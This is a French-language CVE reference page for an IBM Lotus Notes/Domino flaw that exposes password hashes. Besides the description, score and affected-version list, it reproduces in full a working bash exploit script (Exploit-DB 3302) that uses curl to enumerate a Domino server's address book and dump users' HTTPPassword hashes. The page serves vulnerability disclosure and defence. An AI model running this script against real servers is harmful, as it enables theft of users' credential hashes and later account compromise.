Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Descriptions du CVE
IBM Lotus Notes does not properly restrict access to password hashes in the Notes Address Book (NAB), which allows remote attackers to obtain sensitive information via the (1) password digest field in the Administration tab of a Lotus Notes client, (2) "PasswordDigest" and "HTTPPassword" fields in the document properties in the NAB, or (3) a direct query to the Domino LDAP server, a different vulnerability than CVE-2005-2428.
Informations du CVE
Métriques
| Métriques | Score | Gravité | CVSS Vecteur | Source |
|---|---|---|---|---|
| V2 | 5 | AV:N/AC:L/Au:N/C:P/I:N/A:N | nvd@nist.gov |
EPSS
EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.
Score EPSS
Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.
Percentile EPSS
Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
Informations sur l'Exploit
Exploit Database EDB-ID : 3302
Date de publication : 2007-02-12 23h00 +00:00
Auteur : Marco Ivaldi
EDB Vérifié : Yes
#!/bin/bash
#
# $Id: raptor_dominohash,v 1.3 2007/02/13 17:27:28 raptor Exp $
#
# raptor_dominohash - Lotus Domino R5/R6 HTTPPassword dump
# Copyright (c) 2007 Marco Ivaldi <raptor@0xdeadbeef.info>
#
# Lotus Domino R5 and R6 WebMail, with "Generate HTML for all fields" enabled,
# stores sensitive data from names.nsf in hidden form fields, which allows
# remote attackers to read the HTML source to obtain sensitive information such
# as (1) the password hash in the HTTPPassword field, (2) the password change
# date in the HTTPPasswordChangeDate field, (3) the client platform in the
# ClntPltfrm field, (4) the client machine name in the ClntMachine field, and
# (5) the client Lotus Domino release in the ClntBld field, a different
# vulnerability than CVE-2005-2696 (CVE-2005-2428).
#
# According to testing, it's possible to dump all HTTPPassword hashes using the
# $defaultview view instead of $users. This saves a considerable amount of time.
#
# The code may require some changes to properly work with your configuration.
#
# See also:
# http://www.securiteinfo.com/outils/DominoHashBreaker.shtml
#
# Usage:
# $ ./raptor_dominohash 192.168.0.202
# [...]
# Extracting the view entries...
# Done! 656 unique entries have been found.
# Now ready to dump password hashes...
# [...]
# [http://192.168.0.202/names.nsf/$defaultview/00DA2289CC118A854925715A000611A3]
# FirstName: Foo
# LastName: Bar
# ShortName: fbar
# HTTPPassword: (355E98E7C7B59BD810ED845AD0FD2FC4)
# [...]
#
# Vulnerable platforms:
# Lotus Domino R6 Webmail [tested]
# Lotus Domino R5 Webmail [untested]
# Lotus Domino R4 Webmail? [untested]
#
# Some vars
i=1
tmp1=dominohash1.tmp
tmp2=dominohash2.tmp
# Command line
host=$1
# Local fuctions
function header() {
echo ""
echo "raptor_dominohash - Lotus Domino R5/R6 HTTPPassword dump"
echo "Copyright (c) 2007 Marco Ivaldi <raptor@0xdeadbeef.info>"
echo ""
}
function footer() {
echo ""
exit 0
}
function usage() {
header
echo "usage : ./raptor_dominohash <host>"
echo "example: ./raptor_dominohash 192.168.0.202"
footer
}
function notfound() {
header
echo "error : curl not found"
footer
}
# Check if curl is there
curl=`which curl 2>/dev/null`
if [ $? -ne 0 ]; then
notfound
fi
# Input control
if [ -z "$1" ]; then
usage
fi
# Remove temporary files
rm -f $tmp1
rm -f $tmp2
header
# Extract the view entries
echo "Extracting the view entries..."
while :
do
curl "http://${host}/names.nsf/\$defaultview?Readviewentries&Start=${i}" 2>/dev/null | grep unid >> $tmp1
# Check grep return value
if [ $? -ne 0 ]; then
break
fi
# Go for the next page
i=`expr $i + 30`
echo -ne "\b\b\b\b\b\b\b\b$i"
done
cat $tmp1 | awk -F'unid="' '{print $2}' | awk -F'"' '{print $1}' | sort | uniq > $tmp2
# Check if some view entries have been found
if [ ! -s $tmp2 ]; then
echo "No entries found on host ${host}!"
footer
fi
echo -ne "\b\b\b\b\b\b\b\bDone! "
echo "`wc -l ${tmp2} | awk '{print $1}'` unique entries have been found."
echo ""
# Perform the hash dumping
echo "Now ready to dump password hashes..."
echo ""
sleep 4
for unid in `cat $tmp2`
do
echo "[http://${host}/names.nsf/\$defaultview/${unid}]"
echo ""
#curl "http://${host}/names.nsf/\$defaultview/${unid}?OpenDocument" 2>/dev/null | egrep '"FullName"|"HTTPPassword"'
curl "http://${host}/names.nsf/\$defaultview/${unid}?OpenDocument" 2>/dev/null | egrep '"FirstName"|"LastName"|"ShortName"|"HTTPPassword"' | awk -F'input name="' '{print $2}' | awk -F'" type="hidden" value="' '{print $1 ":\t" $2}' | tr -d '">'
echo ""
done
footer
# milw0rm.com [2007-02-13]
Products Mentioned
Configuraton 0
Ibm>>Lotus_notes >> Version *
- Ibm>>Lotus_notes >> Version - (Open CPE detail)
- Ibm>>Lotus_notes >> Version 0.2 (Open CPE detail)
- Ibm>>Lotus_notes >> Version 3.0 (Open CPE detail)
- Ibm>>Lotus_notes >> Version 3.0.0.1 (Open CPE detail)
- Ibm>>Lotus_notes >> Version 3.0.0.2 (Open CPE detail)
- Ibm>>Lotus_notes >> Version 4.2 (Open CPE detail)
- Ibm>>Lotus_notes >> Version 4.2.1 (Open CPE detail)
- Ibm>>Lotus_notes >> Version 4.2.2 (Open CPE detail)
- Ibm>>Lotus_notes >> Version 4.5 (Open CPE detail)
- Ibm>>Lotus_notes >> Version 4.6 (Open CPE detail)
- Ibm>>Lotus_notes >> Version 4.6.7a (Open CPE detail)
- Ibm>>Lotus_notes >> Version 4.6.7h (Open CPE detail)
- Ibm>>Lotus_notes >> Version 5.0 (Open CPE detail)
- Ibm>>Lotus_notes >> Version 5.0.1 (Open CPE detail)
- Ibm>>Lotus_notes >> Version 5.0.1.02 (Open CPE detail)
- Ibm>>Lotus_notes >> Version 5.0.1a (Open CPE detail)
- Ibm>>Lotus_notes >> Version 5.0.1b (Open CPE detail)
- Ibm>>Lotus_notes >> Version 5.0.1c (Open CPE detail)
- Ibm>>Lotus_notes >> Version 5.0.2 (Open CPE detail)
- Ibm>>Lotus_notes >> Version 5.0.2a (Open CPE detail)
- Ibm>>Lotus_notes >> Version 5.0.2b (Open CPE detail)
- Ibm>>Lotus_notes >> Version 5.0.2c (Open CPE detail)
- Ibm>>Lotus_notes >> Version 5.0.3 (Open CPE detail)
- Ibm>>Lotus_notes >> Version 5.0.4 (Open CPE detail)
- Ibm>>Lotus_notes >> Version 5.0.4a (Open CPE detail)
- Ibm>>Lotus_notes >> Version 5.0.5 (Open CPE detail)
- Ibm>>Lotus_notes >> Version 5.0.5.01 (Open CPE detail)
- Ibm>>Lotus_notes >> Version 5.0.5.02 (Open CPE detail)
- Ibm>>Lotus_notes >> Version 5.0.6 (Open CPE detail)
- Ibm>>Lotus_notes >> Version 5.0.6a (Open CPE detail)
- Ibm>>Lotus_notes >> Version 5.0.6a.01 (Open CPE detail)
- Ibm>>Lotus_notes >> Version 5.0.7 (Open CPE detail)
- Ibm>>Lotus_notes >> Version 5.0.7a (Open CPE detail)
- Ibm>>Lotus_notes >> Version 5.0.8 (Open CPE detail)
- Ibm>>Lotus_notes >> Version 5.0.9 (Open CPE detail)
- Ibm>>Lotus_notes >> Version 5.0.9a (Open CPE detail)
- Ibm>>Lotus_notes >> Version 5.0.10 (Open CPE detail)
- Ibm>>Lotus_notes >> Version 5.0.11 (Open CPE detail)
- Ibm>>Lotus_notes >> Version 5.0.12 (Open CPE detail)
- Ibm>>Lotus_notes >> Version 5.0a (Open CPE detail)
- Ibm>>Lotus_notes >> Version 5.02 (Open CPE detail)
- Ibm>>Lotus_notes >> Version 6.0 (Open CPE detail)
- Ibm>>Lotus_notes >> Version 6.0.1 (Open CPE detail)
- Ibm>>Lotus_notes >> Version 6.0.1 (Open CPE detail)
- Ibm>>Lotus_notes >> Version 6.0.1 (Open CPE detail)
- Ibm>>Lotus_notes >> Version 6.0.1 (Open CPE detail)
- Ibm>>Lotus_notes >> Version 6.0.2 (Open CPE detail)
- Ibm>>Lotus_notes >> Version 6.0.2 (Open CPE detail)
- Ibm>>Lotus_notes >> Version 6.0.2 (Open CPE detail)
- Ibm>>Lotus_notes >> Version 6.0.2.2 (Open CPE detail)
- Ibm>>Lotus_notes >> Version 6.0.3 (Open CPE detail)
- Ibm>>Lotus_notes >> Version 6.0.4 (Open CPE detail)
- Ibm>>Lotus_notes >> Version 6.0.5 (Open CPE detail)
- Ibm>>Lotus_notes >> Version 6.5 (Open CPE detail)
- Ibm>>Lotus_notes >> Version 6.5.1 (Open CPE detail)
- Ibm>>Lotus_notes >> Version 6.5.2 (Open CPE detail)
- Ibm>>Lotus_notes >> Version 6.5.3 (Open CPE detail)
- Ibm>>Lotus_notes >> Version 6.5.3.1 (Open CPE detail)
- Ibm>>Lotus_notes >> Version 6.5.4 (Open CPE detail)
- Ibm>>Lotus_notes >> Version 6.5.4.1 (Open CPE detail)
- Ibm>>Lotus_notes >> Version 6.5.4.2 (Open CPE detail)
- Ibm>>Lotus_notes >> Version 6.5.4.3 (Open CPE detail)
- Ibm>>Lotus_notes >> Version 6.5.5 (Open CPE detail)
- Ibm>>Lotus_notes >> Version 6.5.5.1 (Open CPE detail)
- Ibm>>Lotus_notes >> Version 6.5.5.2 (Open CPE detail)
- Ibm>>Lotus_notes >> Version 6.5.5.3 (Open CPE detail)
- Ibm>>Lotus_notes >> Version 6.5.6 (Open CPE detail)
- Ibm>>Lotus_notes >> Version 6.5.6.1 (Open CPE detail)
- Ibm>>Lotus_notes >> Version 6.5.6.2 (Open CPE detail)
- Ibm>>Lotus_notes >> Version 6.5.6.3 (Open CPE detail)
- Ibm>>Lotus_notes >> Version 7.0 (Open CPE detail)
- Ibm>>Lotus_notes >> Version 7.0.0 (Open CPE detail)
- Ibm>>Lotus_notes >> Version 7.0.1 (Open CPE detail)
- Ibm>>Lotus_notes >> Version 7.0.1.1 (Open CPE detail)
- Ibm>>Lotus_notes >> Version 7.0.2 (Open CPE detail)
- Ibm>>Lotus_notes >> Version 7.0.2.1 (Open CPE detail)
- Ibm>>Lotus_notes >> Version 7.0.2.2 (Open CPE detail)
- Ibm>>Lotus_notes >> Version 7.0.2.3 (Open CPE detail)
- Ibm>>Lotus_notes >> Version 7.0.3 (Open CPE detail)
- Ibm>>Lotus_notes >> Version 7.0.3.1 (Open CPE detail)
- Ibm>>Lotus_notes >> Version 7.0.4 (Open CPE detail)
- Ibm>>Lotus_notes >> Version 7.0.4.0 (Open CPE detail)
- Ibm>>Lotus_notes >> Version 7.0.4.1 (Open CPE detail)
- Ibm>>Lotus_notes >> Version 7.0.4.2 (Open CPE detail)
- Ibm>>Lotus_notes >> Version 8.0 (Open CPE detail)
- Ibm>>Lotus_notes >> Version 8.0.0 (Open CPE detail)
- Ibm>>Lotus_notes >> Version 8.0.1 (Open CPE detail)
- Ibm>>Lotus_notes >> Version 8.0.2 (Open CPE detail)
- Ibm>>Lotus_notes >> Version 8.0.2.0 (Open CPE detail)
- Ibm>>Lotus_notes >> Version 8.0.2.1 (Open CPE detail)
- Ibm>>Lotus_notes >> Version 8.0.2.2 (Open CPE detail)
- Ibm>>Lotus_notes >> Version 8.0.2.3 (Open CPE detail)
- Ibm>>Lotus_notes >> Version 8.0.2.4 (Open CPE detail)
- Ibm>>Lotus_notes >> Version 8.0.2.5 (Open CPE detail)
- Ibm>>Lotus_notes >> Version 8.0.2.6 (Open CPE detail)
- Ibm>>Lotus_notes >> Version 8.5 (Open CPE detail)
- Ibm>>Lotus_notes >> Version 8.5.0.0 (Open CPE detail)
- Ibm>>Lotus_notes >> Version 8.5.0.1 (Open CPE detail)
- Ibm>>Lotus_notes >> Version 8.5.1 (Open CPE detail)
- Ibm>>Lotus_notes >> Version 8.5.1.0 (Open CPE detail)
- Ibm>>Lotus_notes >> Version 8.5.1.1 (Open CPE detail)
- Ibm>>Lotus_notes >> Version 8.5.1.2 (Open CPE detail)
- Ibm>>Lotus_notes >> Version 8.5.1.3 (Open CPE detail)
- Ibm>>Lotus_notes >> Version 8.5.1.4 (Open CPE detail)
- Ibm>>Lotus_notes >> Version 8.5.1.5 (Open CPE detail)
- Ibm>>Lotus_notes >> Version 8.5.2 (Open CPE detail)
- Ibm>>Lotus_notes >> Version 8.5.2.0 (Open CPE detail)
- Ibm>>Lotus_notes >> Version 8.5.2.1 (Open CPE detail)
- Ibm>>Lotus_notes >> Version 8.5.2.2 (Open CPE detail)
- Ibm>>Lotus_notes >> Version 8.5.2.3 (Open CPE detail)
- Ibm>>Lotus_notes >> Version 8.5.3 (Open CPE detail)
- Ibm>>Lotus_notes >> Version 8.5.3.1 (Open CPE detail)
- Ibm>>Lotus_notes >> Version 8.5.3.2 (Open CPE detail)
- Ibm>>Lotus_notes >> Version 8.5.3.3 (Open CPE detail)
- Ibm>>Lotus_notes >> Version 8.5.3.4 (Open CPE detail)
- Ibm>>Lotus_notes >> Version 8.5.3.5 (Open CPE detail)
- Ibm>>Lotus_notes >> Version 8.5.3.6 (Open CPE detail)
- Ibm>>Lotus_notes >> Version 8.5.4 (Open CPE detail)
- Ibm>>Lotus_notes >> Version 9.0 (Open CPE detail)
- Ibm>>Lotus_notes >> Version 9.0.0.0 (Open CPE detail)
- Ibm>>Lotus_notes >> Version 9.0.1.0 (Open CPE detail)
- Ibm>>Lotus_notes >> Version 9.0.1.1 (Open CPE detail)
- Ibm>>Lotus_notes >> Version r5 (Open CPE detail)
- Ibm>>Lotus_notes >> Version r6 (Open CPE detail)
Références
Les informations affichées sur CVE Find proviennent de plusieurs sources de référence rigoureusement sélectionnées. Les données CVE sont fournies par MITRE Corporation et la National Vulnerability Database (NVD). Le catalogue des vulnérabilités activement exploitées (KEV) provient de la Cybersecurity and Infrastructure Security Agency (CISA), tandis que les scores EPSS sont issus de FIRST.org. Enfin, les données relatives aux faiblesses logicielles (CWE) et aux schémas d'attaque courants (CAPEC)
sont maintenues par MITRE Corporation, et les informations sur les configurations
logicielles et matérielles (CPE) proviennent du NVD.